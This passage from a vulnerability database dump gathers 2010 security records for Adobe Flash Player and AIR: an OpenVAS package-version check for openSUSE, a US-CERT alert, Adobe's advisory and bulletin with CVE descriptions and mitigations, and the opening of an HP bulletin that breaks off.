"CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Check for the Version of flash-player", "modified": "2017-12-25T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:850133", "href": "http://plugins.openvas.org/nasl.php?oid=850133", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:024", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:024\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to fix multiple critical security\n vulnerabilities which allow an attacker to remotely execute arbitrary\n code or to cause a denial of service.\n\n The Flash Plugin was upgraded to version 10.1.53.64.\n\n The following CVE numbers have been assigned:\n CVE-2010-2160,\n CVE-2010-2164,\n CVE-2010-2169,\n CVE-2010-2173,\n CVE-2010-2177,\n CVE-2010-2181,\n CVE-2010-2185,\n CVE-2010-2189\n\n The standalone flash player was not yet updated by Adobe and will be\n fixed in a future update.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850133);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-024\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:024\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1297"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA10-162A\r\n\r\n\r\nAdobe Flash and AIR Vulnerabilities\r\n\r\n Original release date: June 11, 2010\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Adobe Flash Player 10.0.45.2 and earlier 10.x versions\r\n * Adobe Flash Player 9.0.262 and earlier 9.x versions\r\n * Adobe AIR 1.5.3.9130 and earlier versions\r\n\r\n Other Adobe products that support Flash may also be vulnerable.\r\n\r\n\r\nOverview\r\n\r\n According to Adobe Security Bulletin APSB10-14, there are\r\n vulnerabilities in Adobe Flash and AIR. These vulnerabilities\r\n affect Flash Player, AIR, and possibly other products that support\r\n Flash. A remote attacker could exploit these vulnerabilities to\r\n execute arbitrary code.\r\n\r\n\r\nI. Description\r\n\r\n Adobe Security Bulletin APSB10-14 describes vulnerabilities in\r\n Adobe Flash that affects Flash Player and AIR. It may also affect\r\n other products that independently support Flash, such as Adobe\r\n Reader, Acrobat, Photoshop, Photoshop Lightroom, Freehand MX, and\r\n Fireworks.\r\n\r\n An attacker could exploit these vulnerabilities by convincing a\r\n user to open specially crafted Flash content. Flash content is\r\n commonly hosted on a web page, but it can also be embedded in a PDF\r\n and other documents or provided as a stand-alone file.\r\n\r\n One of these vulnerabilities, CVE-2010-1297, is being exploited\r\n against Flash Player, Adobe Reader, and Acrobat. Additional\r\n information about CVE-2010-1297 is available in US-CERT Technical\r\n Cyber Security Alert TA10-159A and US-CERT Vulnerability Note\r\n VU#486225.\r\n\r\n\r\nII. Impact\r\n\r\n If a user opens specially crafted Flash content, a remote attacker\r\n may be able to execute arbitrary code.\r\n\r\n\r\nIII. Solution\r\n\r\n Update Flash and AIR\r\n\r\n Adobe Security Bulletin APSB10-14 recommends updating to Flash\r\n Player 10.1.53.64 or 9.0.277.0 and AIR to 2.0.2.12610. This will\r\n update the Flash web browser plug-in and ActiveX control and AIR,\r\n but will not update Flash support in Adobe Reader, Acrobat, or\r\n other products.\r\n\r\n To reduce your exposure to these and other Flash vulnerabilities,\r\n consider the following mitigation technique.\r\n\r\n Disable Flash in your web browser\r\n\r\n Uninstall Flash or restrict which sites are allowed to run Flash.\r\n To the extent possible, only run trusted Flash content on trusted\r\n domains. For more information, see Securing Your Web Browser.\r\n\r\n\r\nIV. References\r\n\r\n * Adobe Security Bulletin APSB10-14 -\r\n <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\r\n\r\n * Technical Cyber Security Alert TA10-159A -\r\n <http://www.us-cert.gov/cas/techalerts/TA10-159A.html>\r\n\r\n * US-CERT Vulnerability Report VU#486225 -\r\n <http://www.kb.cert.org/vuls/id/486225>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/>\r\n\r\n * CVE-2010-1297 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA10-162A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA10-162A Feedback VU#486225" in\r\n the subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2010 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\nRevision History\r\n\r\n June 11, 2010: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBTBKnQj6pPKYJORa3AQIq+gf/emIaD07wO+6DwdTYMgpYQArprhO5bT+h\r\nkgISYW+OW7Gt4Dq9BkoXgPzgahRRwQZnp0pgjzRst5PsC5+Vn4WCHR8OZBSEoSeo\r\neWL+Y8dqd/IYCPVWjocDbEoeKdDo02hIjRln3dIhvMYIJjO7hffL5OMhle1xW5aJ\r\ny1dYQ4L5oT0OHWN4ZtLnvhMJoqEmpf2Pc2j92JrSNdnesgbGIYNgvcH43vHGQbPp\r\nmA64SkfQCo80CeaSS6dPvnHfRhR8/lPWThoY6Mug4YcpO0Z9SZ7uQ1HftGdMkq67\r\nE4kRZRpnpUGCglte3MVIg5gET3QV0Y8f2uDMv0fmEs38i91aRjJ0fA==\r\n=v/JA\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-06-12T00:00:00", "published": "2010-06-12T00:00:00", "id": "SECURITYVULNS:DOC:24043", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24043", "title": "US-CERT Technical Cyber Security Alert TA10-162A -- Adobe Flash and AIR Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1297"], "description": "Security Advisory for Flash Player, Adobe Reader and Acrobat\r\n\r\nRelease date: June 4, 2010\r\n\r\nLast updated: June 10, 2010\r\n\r\nVulnerability identifier: APSA10-01\r\n\r\nCVE number: CVE-2010-1297\r\n\r\nPlatform: All\r\nSummary\r\n\r\nA critical vulnerability exists in Adobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.\r\n\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nWe expect to provide an update for Adobe Reader and Acrobat 9.3.2 for Windows, Macintosh and UNIX by June 29, 2010. Please note that the Acrobat and Reader update represents an accelerated release of the next quarterly security update originally scheduled for July 13, 2010. With this accelerated scheduled we do not plan to release any new updates for Adobe Reader and Acrobat on July 13, 2010.\r\nAffected software versions\r\n\r\nAdobe Flash Player 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris\r\nAdobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX\r\n\r\nNote: Adobe Reader and Acrobat 8.x are confirmed not vulnerable.\r\nMItigations\r\n\r\nAdobe Flash Player\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nAdobe Reader and Acrobat - Windows\r\nDeleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader 9.x and Acrobat 9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content.\r\n\r\nThe authplay.dll that ships with Adobe Reader 9.x and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll for Adobe Reader or C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll for Acrobat.\r\n\r\nAdobe Reader 9.x - Macintosh\r\n\r\n1) Go to the Applications->Adobe Reader 9 folder.\r\n2) Right Click on Adobe Reader\r\n3) Select Show Package Contents\r\n4) Go to the Contents->Frameworks folder\r\n5) Delete or move the AuthPlayLib.bundle file\r\n\r\nAcrobat Pro 9.x - Macintosh\r\n\r\n1) Go to the Applications->Adobe Acrobat 9 Pro folder.\r\n2) Right Click on Adobe Acrobat Pro\r\n3) Select Show Package Contents\r\n4) Go to the Contents->Frameworks folder\r\n5) Delete or move the AuthPlayLib.bundle file\r\n\r\nAdobe Reader 9.x- UNIX\r\n1) Go to installation location of Reader (typically a folder named Adobe)\r\n2) Within it browse to Reader9/Reader/intellinux/lib/ (for Linux) or Reader9/Reader/intelsolaris/lib/ (for Solaris)\r\n3) Remove the library named "libauthplay.so.0.0.0"\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical issue.\r\nDetails\r\n\r\nA critical vulnerability exists in Adobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.\r\n\r\nAdobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigation is available for Adobe Reader and Acrobat 9.x customers as detailed above.\r\n\r\nAdobe actively shares information about this and other vulnerabilities with partners in the security community to enable them to quickly develop detection and quarantine methods to protect users until a patch is available. As always, Adobe recommends that users follow security best practices by keeping their anti-malware software and definitions up to date.\r\n\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nWe expect to provide an update for Adobe Reader and Acrobat 9.3.2 for Windows, Macintosh and UNIX by June 29, 2010. Please note that the Acrobat and Reader update represents an accelerated release of the next quarterly security update originally scheduled for July 13, 2010. With this accelerated scheduled we do not plan to release any new updates for Adobe Reader and Acrobat on July 13, 2010.\r\n\r\nUsers may monitor the latest information on the Adobe Product Security Incident Response Team blog at the following URL: http://blogs.adobe.com/psirt or by subscribing to the RSS feed here: http://blogs.adobe.com/psirt/atom.xml.\r\nRevisions\r\n\r\nJune 10, 2010 - Advisory updated with link to Security Bulletin APSB10-14 that resolves the security issue for Adobe Flash Player.\r\nJune 8, 2010 - Added information to note that the upcoming Adobe Reader and Acrobat update represents the next quarterly security release, originally scheduled for July 13, 2010.\r\nJune 7, 2010 - Update schedule information added, and instructions for Macintosh and UNIX added to 'Mitigations' section.\r\nJune 4, 2010 - Advisory released.\r\n\r\n ", "edition": 1, "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "SECURITYVULNS:DOC:24038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24038", "title": "Security Advisory for Flash Player, Adobe Reader and Acrobat", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Multiple vulnerabilities on Flash content parsing.", "edition": 1, "modified": "2010-06-26T00:00:00", "published": "2010-06-26T00:00:00", "id": "SECURITYVULNS:VULN:10921", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10921", "title": "Adobe Flash Player / Acrobat / Reader memory corruptions", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "ecurity update available for Adobe Flash Player\r\n\r\nRelease date: June 10, 2010\r\n\r\nLast updated: June 10, 2010\r\n\r\nVulnerability identifier: APSB10-14\r\n\r\nCVE number: CVE-2008-4546, CVE-2009-3793, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2188, CVE-2010-2189\r\n\r\nPlatform: All Platforms\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player version 10.0.45.2 and earlier. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Flash Player 10.0.45.2 and earlier versions update to Adobe Flash Player 10.1.53.64. Adobe recommends users of Adobe AIR 1.5.3.9130 and earlier versions update to Adobe AIR 2.0.2.12610.\r\nAffected software versions\r\n\r\nAdobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris\r\nAdobe AIR 1.5.3.9130 and earlier versions for Windows, Macintosh and Linux\r\n\r\nTo verify the Adobe Flash Player version number installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.\r\n\r\nTo verify the Adobe AIR version number installed on your system, access the Adobe AIR TechNote for instructions.\r\nSolution\r\n\r\nAdobe Flash Player\r\nAdobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64 by downloading it from the Adobe Flash Player Download Center or by using the auto-update mechanism within the product when prompted.\r\n\r\nTo address the vulnerabilities described in this Security Bulletin, a prerelease version of Flash Player 10.1 for Solaris platforms is available from Adobe Labs.\r\n\r\nFor users who cannot update to Flash Player 10.1.53.64, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.277.0, which can be downloaded from the following link.\r\n\r\nAdobe AIR\r\nAdobe recommends all users of Adobe AIR 1.5.3.9130 and earlier versions update to the newest version 2.0.2.12610 by downloading it from the Adobe AIR Download Center.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends affected users update their installations to the newest versions.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player version 10.0.45.2 and earlier. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-1297).\r\nNote: There are reports that this issue is being actively exploited in the wild.\r\n\r\nThis update resolves a memory exhaustion vulnerability that could lead to code execution (CVE-2009-3793).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2160).\r\n\r\nThis update resolves an indexing vulnerability that could lead to code execution (CVE-2010-2161).\r\n\r\nThis update resolves a heap corruption vulnerability that could lead to code execution (CVE-2010-2162).\r\n\r\nThis update resolves multiple vulnerabilities that could lead to code execution (CVE-2010-2163).\r\n\r\nThis update resolves a use after free vulnerability that could lead to code execution (CVE-2010-2164).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2165).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2166).\r\n\r\nThis update resolves multiple heap overflow vulnerabilities that could lead to code execution (CVE-2010-2167).\r\n\r\nThis update resolves a pointer memory corruption that could lead to code execution (CVE-2010-2169).\r\n\r\nThis update resolves an integer overflow vulnerability that could lead to code execution (CVE-2010-2170).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2171).\r\n\r\nThis update resolves a denial of service issue on some UNIX platforms (Flash Player 9 only) (CVE-2010-2172).\r\n\r\nThis update resolves an invalid pointer vulnerability that could lead to code execution (CVE-2010-2173).\r\n\r\nThis update resolves an invalid pointer vulnerability that could lead to code execution (CVE-2010-2174).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2175).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2176).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2177).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2178).\r\n\r\nThis update resolves a URL parsing vulnerability that could lead to cross-site scripting (Firefox and Chrome browsers only) (CVE-2010-2179).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2180).\r\n\r\nThis update resolves an integer overflow vulnerability that could lead to code execution (CVE-2010-2181).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2182).\r\n\r\nThis update resolves a integer overflow vulnerability that could lead to code execution (CVE-2010-2183).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2184).\r\n\r\nThis update resolves a buffer overflow vulnerability that could lead to code execution (CVE-2010-2185).\r\n\r\nThis update resolves a denial of service vulnerability that can cause the application to crash. Arbitrary code execution has not been demonstrated, but may be possible. (CVE-2010-2186).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2187).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2188).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2189).\r\nNote: This issue occurs only on VMWare systems with VMWare Tools enabled.\r\n\r\nThis update resolves a denial of service issue (CVE-2008-4546).\r\n\r\nAdobe recommends users of Adobe Flash Player 10.0.45.2 and earlier versions update to Adobe Flash Player 10.1.53.64. Adobe recommends users of Adobe AIR 1.5.3.9130 and earlier versions update to Adobe AIR 2.0.2.12610.\r\n\r\nAffected software\r\n\t\r\n\r\nRecommended player update\r\n\t\r\n\r\nAvailability\r\n\r\nFlash Player 10.0.45.2 and earlier\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Download Center\r\n\r\nFlash Player 10.0.45.2 and earlier - network distribution\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Licensing\r\n\r\nAIR 1.5.3.9130\r\n\t\r\n\r\nAIR 2.0.2.12610\r\n\t\r\n\r\nAIR Download Center\r\n\r\nFlash Professional CS5, Flash CS4 Professional and Flex 4\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\nFlash CS3 Professional and Flex 3\r\n\t\r\n\r\n9.0.277.0\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\n \r\n\r\nNote: The Adobe Flash Player 10.1.53.64 release will be the last version to support Macintosh PowerPC-based G3 computers. Adobe will be discontinuing support of PowerPC-based G3 computers and will no longer provide security updates after the Flash Player 10.1.53.64 release. This unavailability is due to performance enhancements that cannot be supported on the older PowerPC architecture.\r\nAcknowledgments\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:\r\n\r\n * Will Dormann of CERT (CVE-2010-1297, CVE-2010-2163)\r\n * Lockheed Martin CIRT, Members of the Defense Security Information Exchange (DSIE) (CVE-2010-1297)\r\n * Ralph Loader of Innaworks Development Limited (CVE-2009-3793)\r\n * An Anonymous Researcher and Dionysus Blazakis through TippingPoint's Zero Day Initiative (CVE-2010-2160)\r\n * An Anonymous Researcher reported through iDefense's Vulnerability Contributor Program (CVE-2010-2161)\r\n * Damian Put through TippingPoint's Zero Day Initiative (CVE-2010-2162, CVE-2010-2188)\r\n * An Anonymous Researcher reported through iDefense's Vulnerability Contributor Program (CVE-2010-2164)\r\n * Megumi Yanagishita of Palo Alto Networks Inc. (CVE-2010-2165)\r\n * Bing Liu of Fortinet's FortiGuard Labs (CVE-2010-2163, CVE-2010-2166)\r\n * Nicolas Joly of VUPEN Vulnerability Research Team (CVE-2010-2167, CVE-2010-2173, CVE-2010-2174)\r\n * Manuel Caballero and Microsoft Vulnerability Research (MSVR) (CVE-2010-2169)\r\n * Tielei Wang from ICST-ERCIS (Engineering Research Center of Info Security, Institute of Computer Science & Technology, Peking University / China) (CVE-2010-2170)\r\n * An Anonymous Researcher and Tielei Wang, from ICST-ERCIS, Peking University, through TippingPoint's Zero Day Initiative (CVE-2010-2171)\r\n * Report submitted by Red Hat Security Response Team (CVE-2010-2172)\r\n * Bo Qu of Palo Alto Networks (CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178)\r\n * Ezio Anselmo Mazarim Fernandes (CVE-2010-2179)\r\n * Haifei Li of Fortinet's FortiGuard Labs (CVE-2010-2189)\r\n * Tavis Ormandy of the Google Security Team (CVE-2010-2163, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187).\r\n\r\nRevisions\r\n\r\nJune 10, 2010 - Updated Acknowledgments section, adding Lockheed Martin CIRT and Members of the Defense Security Information Exchange.\r\nJune 10, 2010 - Bulletin released.", "edition": 1, "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "SECURITYVULNS:DOC:24039", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24039", "title": "Security update available for Adobe Flash Player", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-0089", "CVE-2010-0088", "CVE-2010-2176", "CVE-2010-0085", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-0087", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-0092", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-0848", "CVE-2010-2165", "CVE-2010-0082", "CVE-2010-2170", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2171", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0847", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-0842", "CVE-2010-0845", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0837", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-0849", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-0091", "CVE-2010-1297", "CVE-2010-0090", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-0093", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-0843", "CVE-2010-0084", "CVE-2010-0850", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02273751\r\nVersion: 1\r\n\r\nHPSBMA02547 SSRT100179 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote\r\nExecution of Arbitrary Code and Other Vulnerabilities\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-12\r\nLast Updated: 2010-07-12\r\n\r\nPotential Security Impact: Remote execution of arbitrary code and other vulnerabilities\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY 